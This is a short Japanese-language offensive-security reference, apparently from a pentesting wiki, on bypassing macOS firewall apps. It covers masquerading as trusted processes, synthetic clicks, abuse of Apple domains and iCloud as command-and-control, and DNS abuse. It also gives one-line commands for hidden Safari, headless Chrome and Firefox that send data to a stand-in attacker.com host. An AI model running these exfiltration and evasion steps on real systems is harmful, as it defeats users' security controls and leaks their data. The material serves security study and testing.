発見されたテクニック

以下のテクニックは、一部の macOS ファイアウォールアプリで機能することが確認されました。

ホワイトリスト名の悪用

• たとえば、マルウェアを launchd のようなよく知られた macOS プロセスの名前で呼び出す

シンセティッククリック

• ファイアウォールがユーザーに許可を求める場合、マルウェアに 許可をクリック させる

Apple 署名のバイナリの使用

• curl のようなものだけでなく、whois なども

よく知られた Apple ドメイン

ファイアウォールは、apple.com や icloud.com のようなよく知られた Apple ドメインへの接続を許可している可能性があります。そして iCloud は C2 として使用されるかもしれません。

一般的なバイパス

ファイアウォールをバイパスしようとするいくつかのアイデア

許可されたトラフィックをチェック

許可されたトラフィックを知ることで、潜在的にホワイトリストに登録されているドメインやそれにアクセスできるアプリケーションを特定するのに役立ちます

lsof -i TCP -sTCP:ESTABLISHED

DNSの乱用

DNSの解決は、おそらくDNSサーバーに連絡を取ることが許可されるであろう**mdnsreponder**署名済みアプリケーションを介して行われます。

ブラウザアプリを介して

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

プロセスインジェクションを介して

プロセスにコードをインジェクトできれば、任意のサーバーに接続を許可されているプロセスにコードをインジェクトすることでファイアウォールの保護をバイパスできます:

参考文献

• https://www.youtube.com/watch?v=UlT5KFTMn2k